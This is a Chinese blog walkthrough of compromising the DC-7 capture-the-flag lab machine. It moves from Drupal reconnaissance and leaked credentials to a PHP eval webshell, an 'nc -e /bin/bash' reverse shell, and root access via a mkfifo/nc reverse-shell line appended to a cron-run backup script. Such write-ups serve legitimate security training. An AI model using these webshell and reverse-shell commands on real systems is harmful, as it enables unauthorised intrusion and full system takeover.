渗透测试:DC-7靶机

一、扫描获取靶机ip

arp-scan -l

在这里插入图片描述

192.168.203.146

二、获取网站信息

1.nmap

nmap -sV -A 192.168.203.146

在这里插入图片描述

开放22、80端口

2.Wappaloyzer

在这里插入图片描述

CMS:Drupal 8

Web服务器:Apache 2.4.25

操作系统:Debian

访问网站

在这里插入图片描述

提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工)

在这里插入图片描述

发现一个@用户 @DC7USER

搜索一下发现了一个github用户
在这里插入图片描述在这里插入图片描述
进入然后访问config.php

在这里插入图片描述

得到用户名,密码

$username = dc7user
$password = MdR3xOgB7#dW

三、连接

使用ssh连接

ssh dc7user@192.168.203.146

在这里插入图片描述
与DC-4一样提示有新的邮件

查看邮件

cat /var/mail/dc7user

在这里插入图片描述
发现执行文件backups.sh,查看一下

cat /opt/scripts/backups.sh

在这里插入图片描述
gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码
因为网站默认会有一个admin用户,所以我们进入到/var/www/html目录下,尝试使用drush命令修改admin用户的密码为233333

发现脚本文件中drush 命令可以修改密码

在这里插入图片描述

cd /var/www/html
drush user-password admin --password="233333" 

在这里插入图片描述
成功登录

在这里插入图片描述

在这里插入图片描述

发现可以写入一个网页,但是网页类型没有PHP模式,所以需要下载一个PHP代码的插件,手动安装 PHP filter 模块

下载插件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2B0KFhsF-1629732253114)(C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210814203335872.png)]

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述
Install后跳转到模块添加成功页面,然后去激活这个模块

在这里插入图片描述
在这里插入图片描述
编辑DC-7

在这里插入图片描述
写入一句话木马,注意将文本格式更改成PHP

<?php@eval($_REQUEST['hack']);?>

在这里插入图片描述

3.蚁剑

在这里插入图片描述
连接成功
在这里插入图片描述

攻击机进行监听

nc -lvvp 3939

在这里插入图片描述

使用蚁剑的虚拟终端进行反shell连接

nc -e /bin/bash 192.168.203.141 3939

在这里插入图片描述

连接成功

在这里插入图片描述

使用python反弹一个交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

四、提权

在这里插入图片描述
当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

当前用户 www-data 用户具有写权限,我们通过写权限在该文件中添加反弹shell 指令,当root 用户根据其系统计划任务执行backups.sh 脚本时,会反弹root 的shell

在这里插入图片描述

攻击机进行监听

在这里插入图片描述

cd /opt/scriptsecho "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.141 4040 >/tmp/f" >> backups.sh大意:删除f文件,创建命名管道文件f,将cat f的结果作为输入传给命令执行(/bin/sh),将执行命令的结果重定向给 将nc 192.168.203.141 4040写入/tmp/f这一行为2>&1:将标准错误输出重定向到标准输出理解:这个系统每15分钟执行一次backups.sh脚本,将一条命令写入backups.sh等待下一次执行,写入的内容是删除原有的/tmp/f文件,然后创建一个名为f的命名管道文件,这个文件会执行一次命令执行,执行的内容是反shell连接(nc 192.168.203.141 4040)

需要等待一段时间(大约15分钟),因为这个脚本大约每15分钟执行一次

在这里插入图片描述

提权成功,在/root下读取flag

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值